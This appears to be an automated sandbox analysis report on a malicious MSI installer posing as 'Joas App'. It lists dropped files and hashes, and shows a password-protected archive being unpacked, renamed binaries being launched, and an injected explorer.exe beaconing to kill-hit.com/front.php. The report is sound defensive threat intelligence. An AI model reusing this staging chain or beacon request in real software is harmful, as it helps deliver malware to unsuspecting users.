                                                          SHA-512:FFF3377118F2690CB53966AE7D3BE602D2FBF058D764D0A58A18C6B9A116A8ECE7E05F025606DA5D71BD6DFE6892B80E24E1831025EE7232EA24A3F50F130D02
                                                          Malicious:false
                                                          Preview:...@IXOS.@.....@i..Z.@.....@.....@.....@.....@.....@......&.{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}..Joas App..K064a7Rfk7.msi.@.....@.....@.....@......icon_31.exe..&.{DA5E0F10-2101-4D17-9C89-A01D7F5CF622}.....@.....@.....@.....@.......@.....@.....@.......@......Joas App......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@2....@.....@.]....&.{F39C344E-A83E-4760-8DA8-F27602095B4F}=.C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\.@.......@.....@.....@......&.{BC83E781-7DE2-47A8-97C3-2E6CC9BCAD82}/.21:\Software\Barsoc Quite Sols\Joas App\Version.@.......@.....@.....@......&.{279C32E3-A00A-4513-9A8B-D3984A41A6FB}F.C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\utest.dll.@.......@.....@.....@......&.{B61B35E4-8BE1-4171-B69B-E2423CE9179F}M.C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140.dll.@.......@.....@.....@......&.{FDDB96EE-847
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1021792
                                                          Entropy (8bit):6.608727172078022
                                                          Encrypted:false
                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1201504
                                                          Entropy (8bit):6.4557937684843365
                                                          Encrypted:false
                                                          SSDEEP:24576:W4FsQxRqkY1ngOktwC2Tec+4VGWSlnH/YrjPWeTIUGVUrHtAkJMsFUh29BKjxw:D2QxNwCsec+4VGWSlnfYvO3UGVUrHtAg
                                                          MD5:E83D774F643972B8ECCDB3A34DA135C5
                                                          SHA1:A58ECCFB12D723C3460563C5191D604DEF235D15
                                                          SHA-256:D0A6F6373CFB902FCD95BC12360A9E949F5597B72C01E0BD328F9B1E2080B5B7
                                                          SHA-512:CB5FF0E66827E6A1FA27ABDD322987906CFDB3CDB49248EFEE04D51FEE65E93B5D964FF78095866E197448358A9DE9EC7F45D4158C0913CBF0DBD849883A6E90
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.163630125591935
                                                          Encrypted:false
                                                          SSDEEP:12:JSbX72FjL6AGiLIlHVRpZh/7777777777777777777777777vDHFaTz7NMuit/lN:JYQI5tyBMiF
                                                          MD5:FAEACD97DECA5DF029D6A209199CE41C
                                                          SHA1:4D4906BA34C0115D4C2AA1966434678166373F0A
                                                          SHA-256:A91E70F411D66B3B63ACBA70DABDA573C59AD7A066D738C0BB66A7CBCBED7CB0
                                                          SHA-512:8905D30AF1B15C4B0FCEB7856077703A1156AE09E1A353596843A6D42E0A2434982245E790C24C316E469F42FFBB5A9519B2EE519EABC331289C7438CAA69200
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.574504812419244
                                                          Encrypted:false
                                                          SSDEEP:48:Ny8PhUuRc06WXJSjT5qKnuAEbCyqSNhMUXgSUTESF:NdhU1JjTkKtwCB4Xgt
                                                          MD5:79F0D1E902CC9D5F62DA1B38C8C82288
                                                          SHA1:68510A9304ACACAC76C3079A4D4A11EE521B1AE9
                                                          SHA-256:08C3F01A544E90B78C789DF944D6FD91CDC6E46F3D3AB2A03C003772A75369D2
                                                          SHA-512:B517339AAEC4F1E38CBD6EB14AA08873C4625CCDA15510016554578B4C5225BC705C4591B16E3A614514F45988E7F0D22C435EA5973E7841C44248CD4708DCDF
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):360001
                                                          Entropy (8bit):5.3629952290808465
                                                          Encrypted:false
                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauo:zTtbmkExhMJCIpEh
                                                          MD5:0F9BDA45F89DD1FE385B61A449058AEA
                                                          SHA1:DD8346ECF64DB978582D34135F51A5D8412CEC95
                                                          SHA-256:2B67879E7845621ACE5DEABDBC44147BD2A1A7F20FB6B4FBD8B1B4E56388B3B8
                                                          SHA-512:AF51C1749145FDA468B03FB75C77F79DF7E2BEC2A0B8870F371603089ACD07CB58E1D54434D4A9500D83FB8EF6FB13D490A5FB3943C64D1B5E317595752E8671
                                                          Malicious:false
                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):0.0716018731360741
                                                          Encrypted:false
                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOaucLPT3NMlXgVky6lit/:2F0i8n0itFzDHFaTz7NMBit/
                                                          MD5:FDA652D3FE91949698C60F0D659C9483
                                                          SHA1:FC8406265C7458399982C84D3882E59AE690B34B
                                                          SHA-256:0E1E59A506474B2050530F0347C0E35F8C209545BBC3F3D5367874F309C20402
                                                          SHA-512:B054EEB741D6409BC001F82DB9F5CB831DBD61EF5CE9F265E2F8D274470D7C322F021E64C6B590B6F7E2CBE943AABF545F9577166B052B4229A573BEF15D7B51
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.574504812419244
                                                          Encrypted:false
                                                          SSDEEP:48:Ny8PhUuRc06WXJSjT5qKnuAEbCyqSNhMUXgSUTESF:NdhU1JjTkKtwCB4Xgt
                                                          MD5:79F0D1E902CC9D5F62DA1B38C8C82288
                                                          SHA1:68510A9304ACACAC76C3079A4D4A11EE521B1AE9
                                                          SHA-256:08C3F01A544E90B78C789DF944D6FD91CDC6E46F3D3AB2A03C003772A75369D2
                                                          SHA-512:B517339AAEC4F1E38CBD6EB14AA08873C4625CCDA15510016554578B4C5225BC705C4591B16E3A614514F45988E7F0D22C435EA5973E7841C44248CD4708DCDF
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):1.2609076298842805
                                                          Encrypted:false
                                                          SSDEEP:48:sVcuQI+CFXJFT5EEKnuAEbCyqSNhMUXgSUTESF:gccdTuEKtwCB4Xgt
                                                          MD5:818097BC96CF1A376FE84E17454C00D5
                                                          SHA1:3F6A59E2FF313F7AC286BD30A7712D89BBEA3BD4
                                                          SHA-256:33D1CE8A6908AC2EB3B21896A1C22C1C55F20CFCBD2774B84B0941EA7DA02CBD
                                                          SHA-512:79C66A41CAA3FA781CA85DACDBDE055D0578F6A10B3DCFC6C1E887EF2257495E91A84D7081B44457B372AFA983FBD1E85610F7B11D027086784C14941F4538B9
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):73728
                                                          Entropy (8bit):0.14128246009315829
                                                          Encrypted:false
                                                          SSDEEP:24:RzmFHTxkVipVkbk7AEVkyjCyqipVksVgwG0ZMU80U+2j:RSFHTASVAEbCyqSNhMUXUnj
                                                          MD5:74701B26289F94FC905E8D0A657BC906
                                                          SHA1:6AADFECA1B927EA8E2CE9EDB4E407DE6B47A95B7
                                                          SHA-256:1873E4E8D590A07CFD2CDF53600FDBD9174E4EABE34F307FA36D13B7A22872D7
                                                          SHA-512:CA0BE4E0BD88B569B353481ECBC0C7F99175DBD64FC152949D0213CE631CEC1A23B287A144DBD579BE7532ADBE4DB71E8F164A7FA6094C5C3B19A2031618C7C3
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):1.2609076298842805
                                                          Encrypted:false
                                                          SSDEEP:48:sVcuQI+CFXJFT5EEKnuAEbCyqSNhMUXgSUTESF:gccdTuEKtwCB4Xgt
                                                          MD5:818097BC96CF1A376FE84E17454C00D5
                                                          SHA1:3F6A59E2FF313F7AC286BD30A7712D89BBEA3BD4
                                                          SHA-256:33D1CE8A6908AC2EB3B21896A1C22C1C55F20CFCBD2774B84B0941EA7DA02CBD
                                                          SHA-512:79C66A41CAA3FA781CA85DACDBDE055D0578F6A10B3DCFC6C1E887EF2257495E91A84D7081B44457B372AFA983FBD1E85610F7B11D027086784C14941F4538B9
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):1.2609076298842805
                                                          Encrypted:false
                                                          SSDEEP:48:sVcuQI+CFXJFT5EEKnuAEbCyqSNhMUXgSUTESF:gccdTuEKtwCB4Xgt
                                                          MD5:818097BC96CF1A376FE84E17454C00D5
                                                          SHA1:3F6A59E2FF313F7AC286BD30A7712D89BBEA3BD4
                                                          SHA-256:33D1CE8A6908AC2EB3B21896A1C22C1C55F20CFCBD2774B84B0941EA7DA02CBD
                                                          SHA-512:79C66A41CAA3FA781CA85DACDBDE055D0578F6A10B3DCFC6C1E887EF2257495E91A84D7081B44457B372AFA983FBD1E85610F7B11D027086784C14941F4538B9
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.574504812419244
                                                          Encrypted:false
                                                          SSDEEP:48:Ny8PhUuRc06WXJSjT5qKnuAEbCyqSNhMUXgSUTESF:NdhU1JjTkKtwCB4Xgt
                                                          MD5:79F0D1E902CC9D5F62DA1B38C8C82288
                                                          SHA1:68510A9304ACACAC76C3079A4D4A11EE521B1AE9
                                                          SHA-256:08C3F01A544E90B78C789DF944D6FD91CDC6E46F3D3AB2A03C003772A75369D2
                                                          SHA-512:B517339AAEC4F1E38CBD6EB14AA08873C4625CCDA15510016554578B4C5225BC705C4591B16E3A614514F45988E7F0D22C435EA5973E7841C44248CD4708DCDF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):638
                                                          Entropy (8bit):4.751962275036146
                                                          Encrypted:false
                                                          SSDEEP:12:ku/L92WF4gx9l+jsPczo/CdaD0gwiSrlEX6OPkRVdoaQLeU4wv:ku/h5F4Bs0oCdalwisCkRVKVeU4wv
                                                          MD5:15CA959638E74EEC47E0830B90D0696E
                                                          SHA1:E836936738DCB6C551B6B76054F834CFB8CC53E5
                                                          SHA-256:57F2C730C98D62D6C84B693294F6191FD2BEC7D7563AD9963A96AE87ABEBF9EE
                                                          SHA-512:101390C5D2FA93162804B589376CF1E4A1A3DD4BDF4B6FE26D807AFC3FF80DA26EE3BAEB731D297A482165DE7CA48508D6EAA69A5509168E9CEF20B4A88A49FD
                                                          Malicious:false
                                                          Preview:[createdump] createdump [options] pid..-f, --name - dump path and file name. The default is '%TEMP%\dump.%p.dmp'. These specifiers are substituted with following values:.. %p PID of dumped process... %e The process executable filename... %h Hostname return by gethostname()... %t Time of dump, expressed as seconds since the Epoch, 1970-01-01 00:00:00 +0000 (UTC)...-n, --normal - create minidump...-h, --withheap - create minidump with heap (default)...-t, --triage - create triage minidump...-u, --full - create full core dump...-d, --diag - enable diagnostic messages...-v, --verbose - enable verbose diagnostic messages...
                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {DA5E0F10-2101-4D17-9C89-A01D7F5CF622}, Number of Words: 10, Subject: Joas App, Author: Barsoc Quite Sols, Name of Creating Application: Joas App, Template: x64;2057, Comments: This installer database contains the logic and data required to install Joas App., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jan 14 17:29:51 2025, Last Saved Time/Date: Tue Jan 14 17:29:51 2025, Last Printed: Tue Jan 14 17:29:51 2025, Number of Pages: 450
                                                          Entropy (8bit):7.223374477574857
                                                          TrID:
                                                          • Windows SDK Setup Transform Script (63028/2) 88.73%
                                                          • Generic OLE2 / Multistream Compound File (8008/1) 11.27%
                                                          File name:K064a7Rfk7.msi
                                                          File size:59'426'257 bytes
                                                          MD5:32af5cfab7bb87beedb521de43837347
                                                          SHA1:2f128db2405dd0362ce55629816dc8bbe83c0478
                                                          SHA256:b582b290012af285192ffdecc87a30f3964dacb82e26025c558aa0f46f2ab6fe
                                                          SHA512:ca18c6552db2d1d1502c75d41d69dd91a4f76a42c9e6c0d912871b65f085ccaf772cebc0555d658e4da4caa48deef0b14a8e4d812c2461fd18661cea410be7e3
                                                          SSDEEP:1572864:7okVmrjV7eILsOTZGcaN51GnOY3v+4p3cO6Gs:87scu+Z3H2t
                                                          TLSH:B5D76C01B3FA4148F2F75E717EBA55A594BABD521B30C0EF1204A60E1B72BC25BB1763
                                                          Icon Hash:2d2e3797b32b2b99
                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Jan 14, 2025 22:27:24.810416937 CET | 49779 | 80 | 192.168.2.6 | 104.21.37.86
                                                          Jan 14, 2025 22:27:24.815386057 CET | 80 | 49779 | 104.21.37.86 | 192.168.2.6
                                                          Jan 14, 2025 22:27:24.815460920 CET | 49779 | 80 | 192.168.2.6 | 104.21.37.86
                                                          Jan 14, 2025 22:27:24.815798998 CET | 49779 | 80 | 192.168.2.6 | 104.21.37.86
                                                          Jan 14, 2025 22:27:24.820635080 CET | 80 | 49779 | 104.21.37.86 | 192.168.2.6
                                                          Jan 14, 2025 22:27:25.748977900 CET | 80 | 49779 | 104.21.37.86 | 192.168.2.6
                                                          Jan 14, 2025 22:27:25.810372114 CET | 49779 | 80 | 192.168.2.6 | 104.21.37.86
                                                          Jan 14, 2025 22:27:25.885545969 CET | 80 | 49779 | 104.21.37.86 | 192.168.2.6
                                                          Jan 14, 2025 22:27:25.949815989 CET | 49779 | 80 | 192.168.2.6 | 104.21.37.86
                                                          Jan 14, 2025 22:27:25.994204998 CET | 49779 | 80 | 192.168.2.6 | 104.21.37.86

                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Jan 14, 2025 22:27:24.790677071 CET | 63354 | 53 | 192.168.2.6 | 1.1.1.1
                                                          Jan 14, 2025 22:27:24.803359032 CET | 53 | 63354 | 1.1.1.1 | 192.168.2.6

                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                          Jan 14, 2025 22:27:24.790677071 CET | 192.168.2.6 | 1.1.1.1 | 0x8074 | Standard query (0) | kill-hit.com | A (IP address) | IN (0x0001) | false

                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                          Jan 14, 2025 22:27:24.803359032 CET | 1.1.1.1 | 192.168.2.6 | 0x8074 | No error (0) | kill-hit.com |  | 104.21.37.86 | A (IP address) | IN (0x0001) | false
                                                          Jan 14, 2025 22:27:24.803359032 CET | 1.1.1.1 | 192.168.2.6 | 0x8074 | No error (0) | kill-hit.com |  | 172.67.206.78 | A (IP address) | IN (0x0001) | false
                                                          • kill-hit.com
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.6 | 49779 | 104.21.37.86 | 80 | 524 | C:\Windows\SysWOW64\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 14, 2025 22:27:24.815798998 CET | 176 | OUT | GET /front.php?a=yrJh28ExgsVYO0Y&id=0 HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                          Host: kill-hit.com
                                                          Jan 14, 2025 22:27:25.748977900 CET887INHTTP/1.1 404 Not Found
                                                          Date: Tue, 14 Jan 2025 21:27:25 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1tExApGNYzAAe%2BXeFIaydJZgdXwrYVyTVXvU5%2FKFzlFeL%2B2u7M08AVPxEAw6uAx7uzWDHfCnheNt5rmUf2H4wIkK%2FhpltS0cTPPCT5mdMzKd5sSvJXluCzvdRL9CfjI%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9020b5befc84ab2d-YYZ
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=14191&min_rtt=14191&rtt_var=7095&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=176&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                          Jan 14, 2025 22:27:25.885545969 CET5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0



                                                          Target ID:0
                                                          Start time:16:27:06
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\msiexec.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\K064a7Rfk7.msi"
                                                          Imagebase:0x7ff6c1bd0000
                                                          File size:69'632 bytes
                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:16:27:06
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\msiexec.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                          Imagebase:0x7ff6c1bd0000
                                                          File size:69'632 bytes
                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:16:27:08
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6E85F61D79C141FA458D0DA7A80AAA4F
                                                          Imagebase:0xa10000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:16:27:22
                                                          Start date:14/01/2025
                                                          Path:C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe" x -p3809610121t -o+ "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\iwhgjds.rar" "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\"
                                                          Imagebase:0x7ff7aacb0000
                                                          File size:506'008 bytes
                                                          MD5 hash:98CCD44353F7BC5BAD1BC6BA9AE0CD68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:16:27:22
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:16:27:23
                                                          Start date:14/01/2025
                                                          Path:C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe"
                                                          Imagebase:0x7ff71e740000
                                                          File size:35'656 bytes
                                                          MD5 hash:D3CAC4D7B35BACAE314F48C374452D71
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:16:27:23
                                                          Start date:14/01/2025
                                                          Path:C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe"
                                                          Imagebase:0x7ff7c76d0000
                                                          File size:57'488 bytes
                                                          MD5 hash:71F796B486C7FAF25B9B16233A7CE0CD
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:16:27:23
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:16:27:23
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:16:27:24
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\explorer.exe explorer.exe
                                                          Imagebase:0xc00000
                                                          File size:4'514'184 bytes
                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:16:27:24
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\WerFault.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 1836 -s 256
                                                          Imagebase:0x7ff6c43c0000
                                                          File size:570'736 bytes
                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:9.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:1.9%
                                                            Total number of Nodes:265
